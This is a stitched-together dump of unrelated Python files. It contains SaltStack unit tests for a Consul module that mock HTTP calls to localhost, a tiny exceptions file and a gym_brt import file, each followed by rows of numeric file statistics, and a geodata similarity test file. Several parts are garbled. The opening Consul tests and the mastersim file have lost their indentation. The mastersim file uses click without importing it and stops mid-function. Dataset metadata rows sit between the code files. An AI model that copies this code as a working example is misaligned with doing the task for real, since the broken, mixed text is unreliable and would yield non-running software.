with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to remove service {}."
result = consul.agent_service_deregister(
consul_url=consul_url, serviceid=serviceid
)
expected = {"message": msg.format(serviceid), "res": False}
assert expected == result
def test_agent_service_maintenance():
"""
Test consul agent service maintenance
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
result = consul.agent_service_maintenance(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
serviceid = "sid1"
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
pytest.raises(
SaltInvocationError,
consul.agent_service_maintenance,
consul_url=consul_url,
)
# missing enable
msg = 'Required parameter "enable" is missing.'
result = consul.agent_service_maintenance(
consul_url=consul_url, serviceid=serviceid
)
expected = {"message": msg, "res": False}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Service {} set in maintenance mode."
result = consul.agent_service_maintenance(
consul_url=consul_url, serviceid=serviceid, enable=True
)
expected = {"message": msg.format(serviceid), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to set service {} to maintenance mode."
result = consul.agent_service_maintenance(
consul_url=consul_url, serviceid=serviceid, enable=True
)
expected = {"message": msg.format(serviceid), "res": False}
assert expected == result
def test_session_create():
"""
Test consul session create
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
result = consul.session_create(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
name = "name1"
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
pytest.raises(
SaltInvocationError,
consul.session_create,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Created session {}."
result = consul.session_create(consul_url=consul_url, name=name)
expected = {"message": msg.format(name), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to create session {}."
result = consul.session_create(consul_url=consul_url, name=name)
expected = {"message": msg.format(name), "res": False}
assert expected == result
def test_session_list():
"""
Test consul session list
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.session_list(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.session_list(consul_url=consul_url)
expected = {"data": "test", "res": True}
assert expected == result


def test_session_destroy():
    """
    Test consul session destroy
    """
    consul_url = "http://localhost:1313"
    key = "cluster/key"
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    session = "sid1"
    name = "test"
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.session_destroy(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    # no required arguments
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            pytest.raises(
                SaltInvocationError,
                consul.session_destroy,
                consul_url=consul_url,
            )
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            msg = "Destroyed Session {}."
            result = consul.session_destroy(
                consul_url=consul_url, session=session, name="test"
            )
            expected = {"message": msg.format(session), "res": True}
            assert expected == result


def test_session_info():
    """
    Test consul session info
    """
    consul_url = "http://localhost:1313"
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    session = "sid1"
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.session_info(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    # no required arguments
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            pytest.raises(
                SaltInvocationError,
                consul.session_info,
                consul_url=consul_url,
            )
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.session_info(consul_url=consul_url, session=session)
            expected = {"data": "test", "res": True}
            assert expected == result


def test_catalog_register():
    """
    Test consul catalog register
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    node = "node1"
    address = "addres1"
    nodemeta = {
        "Cpu": "blah",
        "Cpu_num": "8",
        "Memory": "1024",
        "Os": "rhel8",
        "Osarch": "x86_64",
        "Kernel": "foo.bar",
        "Kernelrelease": "foo.release",
        "localhost": "localhost",
        "nodename": node,
        "os_family": "adams",
        "lsb_distrib_description": "distro",
        "master": "master",
    }
    nodemeta_kwargs = {
        "cpu": "blah",
        "num_cpus": "8",
        "mem": "1024",
        "oscode": "rhel8",
        "osarch": "x86_64",
        "kernel": "foo.bar",
        "kernelrelease": "foo.release",
        "localhost": "localhost",
        "nodename": node,
        "os_family": "adams",
        "lsb_distrib_description": "distro",
        "master": "master",
    }
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.catalog_register(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    # no required arguments
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.catalog_register(consul_url=consul_url, token=token)
            expected = {
                "message": "Required argument node argument is missing.",
                "res": False,
            }
            assert expected == result
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.catalog_register(
                consul_url=consul_url,
                token=token,
                node=node,
                address=address,
                **nodemeta_kwargs
            )
            expected = {
                "data": {"Address": address, "Node": node, "NodeMeta": nodemeta},
                "message": "Catalog registration for {} successful.".format(node),
                "res": True,
            }
            assert expected == result


def test_catalog_deregister():
    """
    Test consul catalog deregister
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    node = "node1"
    address = "addres1"
    serviceid = "server1"
    checkid = "check1"
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.catalog_deregister(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    # no required arguments
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.catalog_deregister(consul_url=consul_url, token=token)
            expected = {"message": "Node argument required.", "res": False}
            assert expected == result
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.catalog_deregister(
                consul_url=consul_url,
                token=token,
                node=node,
                serviceid=serviceid,
                checkid=checkid,
            )
            expected = {
                "message": "Catalog item {} removed.".format(node),
                "res": True,
            }
            assert expected == result


def test_catalog_datacenters():
    """
    Test consul catalog datacenters
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_http_result_false = {"status": 204, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.catalog_datacenters(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.catalog_datacenters(consul_url=consul_url, token=token)
            expected = {"data": "test", "res": True}
            assert expected == result


def test_catalog_nodes():
    """
    Test consul catalog nodes
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_http_result_false = {"status": 204, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.catalog_nodes(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.catalog_nodes(consul_url=consul_url, token=token)
            expected = {"data": "test", "res": True}
            assert expected == result


def test_catalog_services():
    """
    Test consul catalog services
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_http_result_false = {"status": 204, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.catalog_services(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.catalog_services(consul_url=consul_url, token=token)
            expected = {"data": "test", "res": True}
            assert expected == result


def test_catalog_service():
    """
    Test consul catalog service
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    service = "service"
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_http_result_false = {"status": 204, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.catalog_service(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    # no required arguments
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            pytest.raises(
                SaltInvocationError,
                consul.catalog_service,
                consul_url=consul_url,
            )
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.catalog_service(
                consul_url=consul_url, token=token, service=service
            )
            expected = {"data": "test", "res": True}
            assert expected == result


def test_catalog_node():
    """
    Test consul catalog node
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    node = "node"
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_http_result_false = {"status": 204, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.catalog_node(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    # no required arguments
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            pytest.raises(
                SaltInvocationError,
                consul.catalog_node,
                consul_url=consul_url,
            )
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.catalog_node(consul_url=consul_url, token=token, node=node)
            expected = {"data": "test", "res": True}
            assert expected == result


def test_health_node():
    """
    Test consul health node
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    node = "node"
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_http_result_false = {"status": 204, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.health_node(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    # no required arguments
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            pytest.raises(
                SaltInvocationError,
                consul.health_node,
                consul_url=consul_url,
            )
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.health_node(consul_url=consul_url, token=token, node=node)
            expected = {"data": "test", "res": True}
            assert expected == result


def test_health_checks():
    """
    Test consul health checks
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    service = "service"
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_http_result_false = {"status": 204, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.health_checks(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    # no required arguments
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            pytest.raises(
                SaltInvocationError,
                consul.health_checks,
                consul_url=consul_url,
            )
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.health_checks(
                consul_url=consul_url, token=token, service=service
            )
            expected = {"data": "test", "res": True}
            assert expected == result


def test_health_service():
    """
    Test consul health service
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    service = "service"
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_http_result_false = {"status": 204, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.health_service(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    # no required arguments
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            pytest.raises(
                SaltInvocationError,
                consul.health_service,
                consul_url=consul_url,
            )
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.health_service(
                consul_url=consul_url, token=token, service=service
            )
            expected = {"data": "test", "res": True}
            assert expected == result


def test_health_state():
    """
    Test consul health state
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    state = "state"
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_http_result_false = {"status": 204, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.health_state(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    # no required arguments
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            pytest.raises(
                SaltInvocationError,
                consul.health_state,
                consul_url=consul_url,
            )
    # state not in allowed states
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.health_state(
                consul_url=consul_url, token=token, state=state
            )
            expected = {
                "message": "State must be any, unknown, passing, warning, or critical.",
                "res": False,
            }
            assert expected == result
    state = "warning"
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.health_state(
                consul_url=consul_url, token=token, state=state
            )
            expected = {"data": "test", "res": True}
            assert expected == result


def test_status_leader():
    """
    Test consul status leader
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_http_result_false = {"status": 204, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.status_leader(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.status_leader(consul_url=consul_url, token=token)
            expected = {"data": "test", "res": True}
            assert expected == result


def test_status_peers():
    """
    Test consul status peers
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_http_result_false = {"status": 204, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.status_peers(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.status_peers(consul_url=consul_url, token=token)
            expected = {"data": "test", "res": True}
            assert expected == result


def test_acl_create():
    """
    Test consul acl create
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    name = "name1"
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_http_result_false = {"status": 204, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.acl_create(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    # no required arguments
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            pytest.raises(
                SaltInvocationError,
                consul.acl_create,
                consul_url=consul_url,
            )
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.acl_create(consul_url=consul_url, token=token, name=name)
            expected = {"message": "ACL {} created.".format(name), "res": True}
            assert expected == result


def test_acl_update():
    """
    Test consul acl update
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    name = "name1"
    aclid = "id1"
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_http_result_false = {"status": 204, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.acl_update(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    # no required arguments
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.acl_update(consul_url=consul_url)
            expected = {
                "message": 'Required parameter "id" is missing.',
                "res": False,
            }
            assert expected == result
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            pytest.raises(
                SaltInvocationError,
                consul.acl_update,
                consul_url=consul_url,
                id=aclid,
            )
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.acl_update(
                consul_url=consul_url, token=token, name=name, id=aclid
            )
            expected = {"message": "ACL {} created.".format(name), "res": True}
            assert expected == result


def test_acl_delete():
    """
    Test consul acl delete
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    name = "name1"
    aclid = "id1"
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_http_result_false = {"status": 204, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.acl_delete(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    # no required arguments
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.acl_delete(consul_url=consul_url)
            expected = {
                "message": 'Required parameter "id" is missing.',
                "res": False,
            }
            assert expected == result
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.acl_delete(
                consul_url=consul_url, token=token, name=name, id=aclid
            )
            expected = {"message": "ACL {} deleted.".format(aclid), "res": True}
            assert expected == result


def test_acl_info():
    """
    Test consul acl info
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    name = "name1"
    aclid = "id1"
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_http_result_false = {"status": 204, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.acl_info(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    # no required arguments
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.acl_info(consul_url=consul_url)
            expected = {
                "message": 'Required parameter "id" is missing.',
                "res": False,
            }
            assert expected == result
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.acl_info(
                consul_url=consul_url, token=token, name=name, id=aclid
            )
            expected = {"data": "test", "res": True}
            assert expected == result


def test_acl_clone():
    """
    Test consul acl clone
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    name = "name1"
    aclid = "id1"
    mock_result = aclid
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_http_result_false = {"status": 204, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.acl_clone(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    # no required arguments
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.acl_clone(consul_url=consul_url)
            expected = {
                "message": 'Required parameter "id" is missing.',
                "res": False,
            }
            assert expected == result
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.acl_clone(
                consul_url=consul_url, token=token, name=name, id=aclid
            )
            expected = {
                "ID": aclid,
                "message": "ACL {} cloned.".format(name),
                "res": True,
            }
            assert expected == result


def test_acl_list():
    """
    Test consul acl list
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    name = "name1"
    aclid = "id1"
    mock_result = aclid
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_http_result_false = {"status": 204, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.acl_list(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.acl_list(
                consul_url=consul_url, token=token, name=name, id=aclid
            )
            expected = {"data": "id1", "res": True}
            assert expected == result


def test_event_fire():
    """
    Test consul event fire
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    name = "name1"
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_http_result_false = {"status": 204, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.event_fire(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    # no required arguments
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            pytest.raises(
                SaltInvocationError,
                consul.event_fire,
                consul_url=consul_url,
            )
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.event_fire(consul_url=consul_url, token=token, name=name)
            expected = {
                "data": "test",
                "message": "Event {} fired.".format(name),
                "res": True,
            }
            assert expected == result


def test_event_list():
    """
    Test consul event list
    """
    consul_url = "http://localhost:1313"
    token = "randomtoken"
    name = "name1"
    mock_result = "test"
    mock_http_result = {"status": 200, "dict": mock_result}
    mock_http_result_false = {"status": 204, "dict": mock_result}
    mock_url = MagicMock(return_value=consul_url)
    mock_nourl = MagicMock(return_value=None)
    # no consul url error
    with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
        result = consul.event_list(consul_url="")
        expected = {"message": "No Consul URL found.", "res": False}
        assert expected == result
    # no required arguments
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            pytest.raises(
                SaltInvocationError,
                consul.event_list,
                consul_url=consul_url,
            )
    with patch.object(salt.utils.http, "query", return_value=mock_http_result):
        with patch.dict(consul.__salt__, {"config.get": mock_url}):
            result = consul.event_list(consul_url=consul_url, token=token, name=name)
            expected = {"data": "test", "res": True}
            assert expected == result

# quix/pay/exceptions.py (repo: tachang/quix.pay, license: BSD-3-Clause)

class ValidationError(Exception): pass
class NotSupportedError(Exception): pass
| 22.8 | 40 | 0.850877 | 12 | 114 | 8.083333 | 0.666667 | 0.268041 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096491 | 114 | 4 | 41 | 28.5 | 0.941748 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.666667 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |

# gym_brt/control/__init__.py (repo: zuzuba/quanser-openai-driver, license: MIT)

from gym_brt.control.control import NoControl
from gym_brt.control.control import RandomControl
from gym_brt.control.control import AeroControl
from gym_brt.control.control import QubeHoldControl
from gym_brt.control.control import QubeFlipUpControl
| 36.875 | 53 | 0.874576 | 42 | 295 | 6 | 0.238095 | 0.166667 | 0.238095 | 0.404762 | 0.714286 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0.084746 | 295 | 7 | 54 | 42.142857 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |

# Metadataextraction/test_mastersim.py (repo: corneliazy/Geosoftware2, license: MIT)

import mastersim #similar # used to invoke the master function
import os # used to get the location of the testdata
__location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
#--detail
click.echo(__location__+'/testdata/')
"""
These tests check if the calucated similar score from two files is
equal to our hand-calculted score
"""
# Bei Tests die Tests 15/16/17 beeinflussen die anderen Tests und aders herum
def test_mastersim_geojson_geotiff():
filepath1 = __location__+'/testdata/Abgrabungen_Kreis_Kleve.geojson'
filepath2 = __location__+'/testdata/wf_100m_klas.tif'
assert mastersim.master(filepath1, filepath2) == 0.02892620198410715
def test_mastersim_geojson_geopackage():
filepath1 = __location__+'/testdata/Abgrabungen_Kreis_Kleve.geojson'
filepath2 = __location__+'/testdata/Queensland_Children_geopackage/census2016_cca_qld_short.gpkg'
assert mastersim.master(filepath1, filepath2) == 1
def test_mastersim_geopackage_geotiff():
filepath1 = __location__+'/testdata/Queensland_Children_geopackage/census2016_cca_qld_short.gpkg'
filepath2 = __location__+'/testdata/wf_100m_klas.tif'
assert mastersim.master(filepath1, filepath2) == 0.8222891646452265
#no crs info available in the shapefile
def test_mastersim_shapefile_equal():
